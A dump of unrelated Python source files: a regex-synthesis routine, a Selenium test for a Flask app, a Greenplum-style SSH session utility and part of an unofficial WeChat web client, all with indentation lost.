while len(sigma_lst2) < split_size:
sigma_lst2.append(False)
label2.append(tmp2)
sigma_lst.append(sigma_lst2)
predict_dict = [dict(Counter(l)) for l in label2]
for batch_idx in range(len(strings)):
set = []
for set_idx in range(10):
src_seq = strings[batch_idx, set_idx].tolist() # list of 30 alphabet
predict_seq_dict = predict_dict[batch_idx * 10 + set_idx] # predict label. ex. {0.0: 2, 1.0: 1, 11.0: 7}
seq = []
idx = 0
for seq_id in range(1, split_size + 1):
tmp = ''
if seq_id in predict_seq_dict.keys():
for _ in range(predict_seq_dict[float(seq_id)]):
tmp += vocab.itos[src_seq[idx]]
idx += 1
seq.append(tmp)
set.append(seq)
splited_string.append(set)
return splited_string, sigma_lst
def is_satisfy_pos(regex, examples, membership):
for string in examples.getPos():
if not membership(regex, string):
return False
return True
def get_sigma(examples):
if is_satisfy_pos('\d*', examples, membership):
return r"\d*"
elif is_satisfy_pos('\w*', examples, membership):
return r"\w*"
else:
return r".*"
def generate_split_regex(splited_pos, splited_neg, split_model=False, count_limit=1000, alphabet_size=5,
data_type='random', sigma_lst=None, submodel='alpharegex'):
regex = []
split_size = len(splited_pos[0])
print("Split Size: ", split_size)
splited_pos = list(filter(lambda x: any(x), splited_pos))
splited_neg = list(filter(lambda x: any(x), splited_neg))
for sub_id in range(split_size):
pos = []
neg = []
for set_idx in range(len(splited_pos)):
pos.append(splited_pos[set_idx][sub_id])
for set_idx in range(len(splited_neg)):
neg.append(splited_neg[set_idx][0])
if not neg:
neg.append('')
sub_pos_set = set(pos)
sub_neg_set = set(neg)
if sub_id + 1 == split_size:
#if sub_id != 0:
prefix = ''.join(regex)
else:
sub_neg_set -= sub_pos_set
prefix = None
print('Splited Positive Strings:', sub_pos_set)
print('Splited Negative Strings:', sub_neg_set)
if len(sub_pos_set) == 1:
regex.append('(' + sub_pos_set.pop() + ')')
continue
if submodel == 'blue_fringe':
count_limit = 1000000000
tmp = rpni_synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = str(tmp)
elif submodel == 'alpharegex':
if data_type == 'random':
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = repr(KleenStar(Or(*[Character(str(x)) for x in range(alphabet_size)])))
else:
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set),
count_limit,
start_with_no_concat=split_model,
prefix_for_neg_test=prefix,
suffix_for_neg_test=None,
alphabet_size=alphabet_size))
else:
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
elif submodel == 'set2regex':
pass
elif submodel == 'regex_generator':
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp = execute([Ex(list(sub_pos_set), list(sub_neg_set))]).replace('++', '+')
if tmp == 'None':
return None, 0
regex.append('(' + tmp + ')')
return ''.join(regex).replace('()',''), split_size
def generate_regex_with_split(sigma_lst, sub_id, sub_pos_set, sub_neg_set, split_model, count_limit, alphabet_size, data_type, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
if data_type == 'random':
if sigma_lst is not None and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = repr(KleenStar(Or(*[Character(str(x)) for x in range(alphabet_size)])))
else:
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set),
count_limit,
start_with_no_concat=split_model,
prefix_for_neg_test=None,
suffix_for_neg_test=None,
alphabet_size=alphabet_size))
else:
if sigma_lst is not None and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=None, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
return_dict[sub_id] = tmp
def generate_regex_with_split_bf(sub_id, sub_pos_set, sub_neg_set, split_model, count_limit, alphabet_size, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
tmp = rpni_synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=None, suffix_for_neg_test=None, alphabet_size=alphabet_size)
return_dict[sub_id] = str(tmp)
def generate_regex_with_split_rg(sub_id, sub_pos_set, sub_neg_set, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
tmp = execute([Ex(list(sub_pos_set), list(sub_neg_set))])
#print(tmp)
tmp = str(tmp).replace('++', '+').replace('?+', '+')
return_dict[sub_id] = tmp
def generate_split_regex_in_parallel(splited_pos, splited_neg, split_model=False, count_limit=1000, alphabet_size=5,
data_type='random', sigma_lst=None, submodel='alpharegex', return_dict=None):
regex = []
split_size = len(splited_pos[0])
print("Split Size: ", split_size)
splited_pos = list(filter(lambda x: any(x), splited_pos))
splited_neg = list(filter(lambda x: any(x), splited_neg))
pos_split_set = []
for sub_id in range(split_size):
pos = []
neg = []
for set_idx in range(len(splited_pos)):
pos.append(splited_pos[set_idx][sub_id])
for set_idx in range(len(splited_neg)):
neg.append(splited_neg[set_idx][0])
if not neg:
neg.append('')
if submodel == 'blue_fringe':
pos = list(map(lambda x:x.replace('!','z'),pos))
neg = list(map(lambda x: x.replace('!', 'z'), neg))
sub_pos_set = set(pos)
sub_neg_set = set(neg)
pos_split_set.append([sub_pos_set, sub_neg_set])
procs = []
if submodel == 'regex_generator':
for sub_id in range(split_size):
proc = Process(target=generate_regex_with_split_rg, args=(sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], return_dict))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
return '(' + ')('.join([return_dict[i] for i in range(split_size)]) + ')'
for sub_id in range(split_size - 1):
if submodel == 'blue_fringe':
count_limit = 1000000000
proc = Process(target=generate_regex_with_split_bf, args=(sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], split_model, count_limit, alphabet_size, return_dict))
elif submodel == 'alpharegex':
proc = Process(target=generate_regex_with_split, args=(sigma_lst, sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], split_model, count_limit, alphabet_size, data_type, return_dict))
elif submodel == 'set2regex':
pass
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
if split_size > 1:
prefix = '(' + ')('.join([return_dict[i] for i in range(split_size - 1)]) + ')'
else:
prefix = ''
if submodel == 'blue_fringe':
count_limit = 1000000000
tmp = rpni_synthesis(Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = str(tmp)
elif submodel == 'alpharegex':
if data_type == 'random':
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
elif submodel == 'set2regex':
pass
if tmp == 'None':
return None, 0
final = prefix + '(' + tmp + ')'
return final.replace('()','') , split_size
|
test_selenium.py
|
#-*- coding: utf-8 -*-
import re
import threading
import time
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import Role, User, Post
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
# start Firefox
try:
cls.client = webdriver.Chrome()
except:
pass
# skip these tests if the browser could not be started
if cls.client:
# create the application
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel("ERROR")
# create the database and populate with some fake data
db.create_all()
Role.insert_roles()
User.generate_fake(10)
Post.generate_fake(10)
# add an administrator user
admin_role = Role.query.filter_by(permissions=0xff).first()
admin = User(email='john@example.com',
username='john', password='cat',
role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
# start the Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# stop the flask server and the browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
# remove application context
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_admin_home_page(self):
# navigate to home page
self.client.get('http://localhost:5000/')
self.assertTrue(re.search('Hello,\s+Stranger!',
self.client.page_source))
# navigate to login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email'). \
send_keys('john@example.com')
self.client.find_element_by_name('password').send_keys('cat')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search('Hello,\s+john!', self.client.page_source))
# navigate to the user's profile page
self.client.find_element_by_link_text('Profile').click()
self.assertTrue('<h1>john</h1>' in self.client.page_source)
|
ssh_utils.py
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This file contains ssh Session class and support functions/classes.
import sys
import os
import cmd
import threading
from gppylib.commands.base import WorkerPool, REMOTE, ExecutionError
from gppylib.commands.unix import Hostname, Echo
sys.path.append(sys.path[0] + '/lib')
import pxssh
import pexpect
import socket
class HostNameError(Exception):
def __init__(self, msg, lineno = 0):
if lineno: self.msg = ('%s at line %d' % (msg, lineno))
else: self.msg = msg
def __str__(self):
return self.msg
class SSHError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
# Utility Functions
def ssh_prefix(host):
ssh = 'ssh -o "BatchMode yes" -o "StrictHostKeyChecking no" ' + host
return ssh
def get_hosts(hostsfile):
hostlist = HostList()
hostlist.parseFile(hostsfile)
return hostlist.get()
class HostList():
def __init__(self):
self.list = []
def get(self):
return self.list
def addHostNameAlternatives(self):
''' Add short name and FQDN for each host to the host list '''
for host in self.list:
try:
fqdn = socket.getfqdn(host)
''' Add fully qualified domain names '''
if fqdn not in self.list:
self.list.append(fqdn)
except socket.error, e:
print "Error while including hostname alternatives"
def add(self, host, lineno=0):
'''Add a host to the hostlist.'''
# we don't allow the user@ syntax here
if host.find('@') >= 0:
raise HostNameError(host, lineno)
# MPP-13617 - check for ipv6
if host.find(':') >= 0:
try:
socket.inet_pton(socket.AF_INET6, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
# MPP-13617 - check for ipv4
if host.find('.') >= 0:
octs = host.split('.')
if len(octs) == 4 and False not in [o.isdigit() for o in octs]:
try:
socket.inet_pton(socket.AF_INET, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
self.list.append(host)
return self.list
def parseFile(self, path):
'''Add lines in a file to the hostlist.'''
with open(path) as fp:
for i, line in enumerate(fp):
line = line.strip()
if not line or line[0] == '#':
continue
self.add(line, i+1)
return self.list
def checkSSH(self):
'''Check that ssh to hostlist is okay.'''
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
raise SSHError("Unable to ssh to '%s'" % cmd.remoteHost)
return True
def filterMultiHomedHosts(self):
'''For multiple host that is of the same node, keep only one in the hostlist.'''
unique = {}
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Hostname('hostname', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for finished_cmd in pool.getCompletedItems():
hostname = finished_cmd.get_hostname()
if (not hostname):
unique[finished_cmd.remoteHost] = finished_cmd.remoteHost
elif not unique.get(hostname):
unique[hostname] = finished_cmd.remoteHost
elif hostname == finished_cmd.remoteHost:
unique[hostname] = finished_cmd.remoteHost
self.list = unique.values()
return self.list
def removeBadHosts(self):
''' Update list of host to include only the host on which SSH was successful'''
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
bad_hosts = []
working_hosts = []
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
bad_hosts.append(cmd.remoteHost)
else:
working_hosts.append(cmd.remoteHost)
self.list = working_hosts[:]
return bad_hosts
# Session is a command session, derived from a base class cmd.Cmd
class Session(cmd.Cmd):
'''Implements a list of open ssh sessions ready to execute commands'''
verbose=False
hostList=[]
userName=None
echoCommand=False
class SessionError(StandardError): pass
class SessionCmdExit(StandardError): pass
def __init__(self, hostList=None, userName=None):
cmd.Cmd.__init__(self)
self.pxssh = []
self.prompt = '=> '
self.peerStringFormatRaw = None
if hostList:
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName
def peerStringFormat(self):
if self.peerStringFormatRaw: return self.peerStringFormatRaw
cnt = 0
for p in self.pxssh:
if cnt < len(p.x_peer): cnt = len(p.x_peer)
self.peerStringFormatRaw = "[%%%ds]" % cnt
return self.peerStringFormatRaw
def login(self, hostList=None, userName=None):
'''This is the normal entry point used to add host names to the object and log in to each of them'''
if self.verbose: print '\n[Reset ...]'
if not (self.hostList or hostList):
raise self.SessionError('No host list available to Login method')
if not (self.userName or userName):
raise self.SessionError('No user name available to Login method')
#Cleanup
self.clean()
if hostList: #We have a new hostlist to use, initialize it
self.hostList=[]
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName #We have a new userName to use
# MPP-6583. Save off term type and set to nothing before creating ssh process
origTERM = os.getenv('TERM', None)
os.putenv('TERM', '')
for host in hostList:
self.hostList.append(host)
p = pxssh.pxssh()
p.loginAsync(host, self.userName)
p.x_peer = host
p.x_pid = p.pid
self.pxssh.append(p)
# Restore terminal type
if origTERM:
os.putenv('TERM', origTERM)
some_errors = False
good_list = []
for p in self.pxssh:
success_login = False
if self.verbose: print '[INFO] login %s' % p.x_peer
try:
success_login = p.loginWait(set_term_dumb=True)
except Exception as e:
pass
if success_login:
good_list.append(p)
else:
some_errors = True
print '[ERROR] unable to login to %s' % p.x_peer
if some_errors:
print 'hint: use gpssh-exkeys to setup public-key authentication between hosts'
self.pxssh = good_list
def close(self):
return self.clean()
def reset(self):
'''reads from all the ssh connections to make sure we dont have any pending cruft'''
for s in self.pxssh:
s.readlines()
def clean(self):
net_return_code = self.closePxsshList(self.pxssh)
self.pxssh = []
return net_return_code
def emptyline(self):
pass
def escapeLine(self,line):
'''Escape occurrences of \ and $ as needed and package the line as an "eval" shell command'''
line = line.strip()
if line == 'EOF' or line == 'exit' or line == 'quit':
raise self.SessionCmdExit()
line = line.split('\\')
line = '\\\\'.join(line)
line = line.split('"')
line = '\\"'.join(line)
line = line.split('$')
line = '\\$'.join(line)
line = 'eval "' + line + '" < /dev/null'
return line
def executeCommand(self,command):
commandoutput=[]
if self.echoCommand:
escapedCommand = command.replace('"', '\\"')
command = 'echo "%s"; %s' % (escapedCommand, command)
#Execute the command in all of the ssh sessions
for s in self.pxssh:
s.sendline(command)
s.flush()
#Wait for each command and retrieve the output
for s in self.pxssh:
#Wait for each command to finish
#!! TODO verify that this is a tight wait loop and find another way to do this
while not s.prompt(120) and s.isalive() and not s.eof(): pass
for s in self.pxssh:
#Split the output into an array of lines so that we can add text to the beginning of
# each line
output = s.before.split('\n')
output = output[1:-1]
commandoutput.append(output)
return commandoutput.__iter__()
# Interactive command line handler
# Override of base class, handles commands that aren't recognized as part of a predefined set
# The "command" argument is a command line to be executed on all available command sessions
# The output of the command execution is printed to the standard output, prepended with
# the hostname of each machine from which the output came
def default(self, command):
line = self.escapeLine(command)
if self.verbose: print command
#Execute the command on our ssh sessions
commandoutput=self.executeCommand(command)
self.writeCommandOutput(commandoutput)
def writeCommandOutput(self,commandoutput):
'''Takes a list of output lists as an iterator and writes them to standard output,
formatted with the hostname from which each output array was obtained'''
for s in self.pxssh:
output = commandoutput.next()
#Write the output
if len(output) == 0:
print (self.peerStringFormat() % s.x_peer)
else:
for line in output:
print (self.peerStringFormat() % s.x_peer), line
def closePxsshList(self,list):
lock = threading.Lock()
return_codes = [0]
def closePxsshOne(p, return_codes):
p.logout()
p.close()
with lock:
return_codes.append(p.exitstatus)
th = []
for p in list:
t = threading.Thread(target=closePxsshOne, args=(p, return_codes))
t.start()
th.append(t)
for t in th:
t.join()
return max(return_codes)
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
from pyqrcode import QRCode
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import http.cookiejar
import requests
import xml.dom.minidom
import json
import time
import ssl
import re
import sys
import os
import subprocess
import random
import multiprocessing
import platform
import logging
import http.client
from collections import defaultdict
from urllib.parse import urlparse
from lxml import html
from socket import timeout as timeout_error
from autoreply import autoReply
#import pdb
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print('\n[*] 强制退出程序')
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, str):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.items():
if isinstance(key, str):
key = key.encode('utf-8')
if isinstance(value, str):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.commandLineQRCode = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # 好友
self.GroupList = [] # 群
self.GroupMemeberList = [] # 群友
self.PublicUsersList = [] # 公众号/服务号
self.SpecialUsersList = [] # 特殊账号
self.autoReplyMode = True
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # 同步最短时间间隔(单位:秒)
self.media_count = -1
self.cookie = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib.request.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
#r = requests.get(url=url, params=params)
#r.encoding = 'utf-8'
#data = r.text
data = self._post(url, params, False).decode("utf-8")
if data == '':
return False
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg('win')
elif sys.platform.find('darwin') >= 0:
self._showQRCodeImg('macos')
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self, str):
if self.commandLineQRCode:
qrCode = QRCode('https://login.weixin.qq.com/l/' + self.uuid)
self._showCommandLineQRCode(qrCode.text(1))
else:
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
if str == 'win':
os.startfile(QRCODE_PATH)
elif str == 'macos':
subprocess.call(["open", QRCODE_PATH])
else:
return
def _showCommandLineQRCode(self, qr_data, enableCmdQR=2):
try:
b = u'\u2588'
sys.stdout.write(b + '\r')
sys.stdout.flush()
except UnicodeEncodeError:
white = 'MM'
else:
white = b
black = ' '
blockCount = int(enableCmdQR)
if abs(blockCount) == 0:
blockCount = 1
white *= abs(blockCount)
if blockCount < 0:
white, black = black, white
sys.stdout.write(' ' * 50 + '\r')
sys.stdout.flush()
qr = qr_data.replace('0', white).replace('1', black)
sys.stdout.write(qr)
sys.stdout.flush()
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r"window.code=(\d+);", data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in range(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # 公众号/服务号
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # 特殊账号
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif '@@' in Contact['UserName']: # 群聊
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # 自己
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in range(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = ['wx2.qq.com',
'webpush.wx2.qq.com',
'wx8.qq.com',
'webpush.wx8.qq.com',
'qq.com',
'webpush.wx.qq.com',
'web2.wechat.com',
'webpush.web2.wechat.com',
'wechat.com',
'webpush.web.wechat.com',
'webpush.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush.wx.qq.com',
'webpush2.wx.qq.com']
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + '/cgi-bin/mmwebwx-bin/synccheck?' + urllib.parse.urlencode(params)
data = self._get(url, timeout=5)
if data == '':
return [-1,-1]
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
if self.DEBUG:
print(json.dumps(dic, indent=4))
(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
